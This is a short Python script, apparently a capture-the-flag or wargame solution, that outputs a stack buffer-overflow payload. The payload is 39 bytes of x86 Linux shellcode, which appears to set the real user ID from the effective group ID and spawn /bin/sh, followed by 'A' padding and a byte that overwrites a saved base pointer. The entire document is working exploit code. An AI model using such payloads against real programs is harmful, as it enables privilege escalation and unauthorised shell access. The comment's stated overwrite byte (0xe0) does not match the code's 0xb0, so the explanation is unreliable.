#!/usr/bin/env python3
# I found that egg script has really no use. I could do with arg only
import sys

shellcode = b"\x6a\x32\x58\xcd\x80\x89\xc3\x89\xc1\x6a\
\x47\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\
\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\
\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

# len(shellcode) == 39, need to pad the remainder of the 64 with a's,
# then 0xe0 at the 65th byte, so that the base pointer of dispatch
# will be changed
payload = shellcode + b'\x41' * (64-39) + b'\xb0'

sys.stdout.buffer.write(payload)
